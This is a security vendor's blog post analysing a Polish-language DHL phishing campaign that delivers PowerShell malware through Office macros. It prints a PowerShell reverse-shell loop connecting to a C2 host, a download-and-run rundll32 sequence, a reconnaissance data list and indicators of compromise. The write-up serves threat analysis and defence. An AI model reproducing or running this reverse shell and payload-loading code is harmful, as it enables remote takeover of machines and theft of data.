Cofense Email Security

PowerShell Scripts Delivered Via Office Macro Attachments Target Polish Employees

[vc_row][vc_column][vc_column_text c_id=”.vc_1576682188364″]By Max Gannon

Cofense IntelligenceTM has uncovered an advanced phishing campaign targeting Polish employees that delivers PowerShell scripts, designed to evade detection by security technologies and give threat actors remote control of the infected computer. The Polish language emails in this campaign impersonate DHL, using misleading content and a spoofed sender email address. The attachment contains a Microsoft (MS) Office macro that checks the language of the installed Office program and only proceeds if it is in Polish language. A PowerShell script is downloaded that, in turn, downloads a set of additional PowerShell scripts, enabling the threat actor to seize control of the computer remotely.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=”17919″ img_size=”medium” alignment=”center” onclick=”link_image”][/vc_column][/vc_row][vc_row][vc_column][vc_column_text c_id=”.vc_1576529697780″]

Figure 1: Original Email

The attached .xls file contains a macro that prompts the “Enable Content” message as well as displaying a button to “print” a receipt, likely intended to lend an air of legitimacy and provide a further reason to enable macros.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=”17920″ img_size=”medium” alignment=”center” onclick=”link_image”][/vc_column][/vc_row][vc_row][vc_column][vc_column_text c_id=”.vc_1576529857501″]

Figure 2: Attached Spreadsheet Content

This button does not appear to work even if macros are enabled. Once enabled, the macro checks to see if the language of the installed Office product is Polish. If it is not, the file closes and opens a new blank workbook. If the installed Office product language is Polish, a .vbe script is downloaded. This script then runs and repeatedly requests a new payload from the same location (mantoropols[.]xyz) and processes each response as a separate PowerShell script. It also attempts to disguise its traffic by performing multiple HTTP POSTs to The POST parameters that retrieve the PowerShell scripts appear to have identifying information about the local computer. However all of the variables are pre-set when the script runs, and only the ID value is unique.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=”17924″ img_size=”medium” alignment=”center” onclick=”link_image”][/vc_column][/vc_row][vc_row][vc_column][vc_column_text c_id=”.vc_1576529892146″]

Figure 3: POST Data from Office macro

Each session with the Command & Control (C2) server begins with a request for information about the local computer using direct PowerShell commands and a mix of consistently placed garbage string. By retrieving these commands through the C2 channel rather than using a locally saved list of possible commands, threat actors make it harder for defenders to know the full suite of options and capabilities available to the threat actors. By collecting the information via PowerShell queries, the threat actors also make it easier to detect virtual environments, as the information retrieved by PowerShell is harder to spoof than the data typically disguised by reverse engineers.

The requested information is:

  • Processor ID (Serial Number)
  • Full Operating System Version
  • Computer name
  • Username
  • Computer “model” (detects VMWare)
  • Computer “manufacturer” (detects VMWare)
  • System language
  • Processor architecture (x86 or x64)
  • PowerShell version
  • Total Physical memory (detects VMWare)
  • IP address
  • Current working directory
  • Current date
  • Installation date (detects VMWare)
  • Graphics card (detects some virtual environments)

The image in Figure 4 is an example of the repeated exchange. Each line beginning with “try” is sent from the server, and the following indented line is sent from the infected computer.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=”17925″ img_size=”medium” alignment=”center” onclick=”link_image”][/vc_column][/vc_row][vc_row][vc_column][vc_column_text c_id=”.vc_1576529949469″]

Figure 4: Data Exfiltration

Next, there are three (or more) separate scripts. Script 1 checks anti-virus and sets persistence via an encoded registry entry and a startup shortcut that often changes based on new commands.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=”17923″ img_size=”medium” alignment=”center” onclick=”link_image”][/vc_column][/vc_row][vc_row][vc_column][vc_column_text c_id=”.vc_1576531577253″]

Figure 5: Creation of LNK Used For Persistence And Decoded Content

The URL payload in the registry is called “finalPayload” in the conversations with the C2, providing some insight into the extent of the PowerShell script controlling the threat actor’s involvement in the infection process. In a similar manner, the threat actor names the section of the script that creates the LNK file as “lnkl”. This labeling is seen at the end of each conversation which the server ends by sending a label such as “lnkl” to the host. The host then responds with that same label.

The payload downloaded by the LNK persistence mechanism is yet another script that initiates a persistent connection to the C2 and then waits for commands.

$test = 0;
while ($true)  {
  try {
    $ErrorActionPreference = "SilentlyContinue";
    $GoYsd803308 = New - Object Net.Sockets.TCPClient("chtroppsoj[.]info", 80);
    $LbkfB457364 = ($GoYsd803308.GetStream());
    [byte[]]$dCrY874 = 0..500|% {
    while (($lxQIfq175383 = $LbkfB457364.Read($dCrY874, 0, $dCrY874.Length))  - ne 0)  {
      $zGNk383 = (New - Object Text.ASCIIEncoding).GetString($dCrY874, 0, $lxQIfq175383);
      $kpqm758 = ([text.encoding]::ASCII).GetBytes((iex $zGNk383 2 > &1));
      $LbkfB457364.Write($kpqm758, 0, $kpqm758.Length);
   } catch {
    Start - Sleep  - s 15;
    if ($GoYsd803308.Connected)  {


Once this persistence mechanism has been established, the next stage is most often the download of additional malware such as Ursnif. This next script is labeled by the threat actor as “downdll” and as its name implies, only downloads a .dll without executing anything.

"downdll"; $XwmpW = New-Object System.Net.WebClient; $XwmpW.Headers["User-Agent"] = "";  $XwmpW.DownloadFile("hXXps://arethatour[.]icu/372873/corpo1.dll", "$env:APPDATASg.dll");

The following script is labeled “rundll”. Unsurprisingly, this runs the .dll downloaded by the previous script.

"rundll"; Start-Process -FilePath "C:WindowsSystem32RUNDLL32.EXE" -ArgumentList "$env:APPDATASg.dll,DllRegisterServer"

Once this command is executed and the client responds with the appropriate “rundll”, the cycle begins again.

By using deceptively simple commands and minimal code, threat actors can perform data exfiltration and payload downloading while maintaining a relatively small footprint. The small script and reliance on executing code either in memory or using data from a registry entry enables threat actors to leave only the .lnk file used for persistence on infected computers. As a result, the threat actors involved in this infection represent a threat to enterprises that do not block PowerShell execution or do not log executed scripts. What makes this threat even more concerning is that although the current process appears to be automated, it would require relatively little effort on the part of the threat actor to manually engage with infected computers.

Description Indicator
PowerShell Reconnaissance Tool Payload and C2s hXXps://chtroppsoj[.]info:443/debug/download/s/rKD
Visual Basic Script Payload hXXps://mantoropols[.]xyz/
Visual Basic Script File printhpp.vbe
Office Macro Payload hXXps://reloffersstart[.]co/ss[.]php?
Office Macro Files 20889194950.xls

[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text c_id=”.vc_1576531668476″]

Table 1: PowerShell Reconnaissance Tool Payload and Command and Control (C2) Locations

How Cofense Can Help:

100% of malware-bearing phishing threats analyzed by the Cofense Phishing Defense Center were reported by end users and bypassed technical controls that were in place to protect them.

Cofense PhishMe offers a simulation template, “Return Shipment – Polish,” to educate users on the phishing tactic described in this blog. Condition users to be resilient to evolving phishing attacks with Cofense PhishMe and remove the blind spot with Cofense Reporter.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence. Cofense Intelligence customers received further information about this threat in Active Threat Report (ATR) 32814.

Quickly turn user reported emails into actionable intelligence with Cofense Triage and reduce exposure time by rapidly quarantining threats with Cofense Vision.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.[/vc_column_text][/vc_column][/vc_row]

Share This Article


We use our own and third-party cookies to enhance your experience. Read more about our cookie policy. By clicking ‘Accept,’ you acknowledge and consent to our use of all cookies on our website.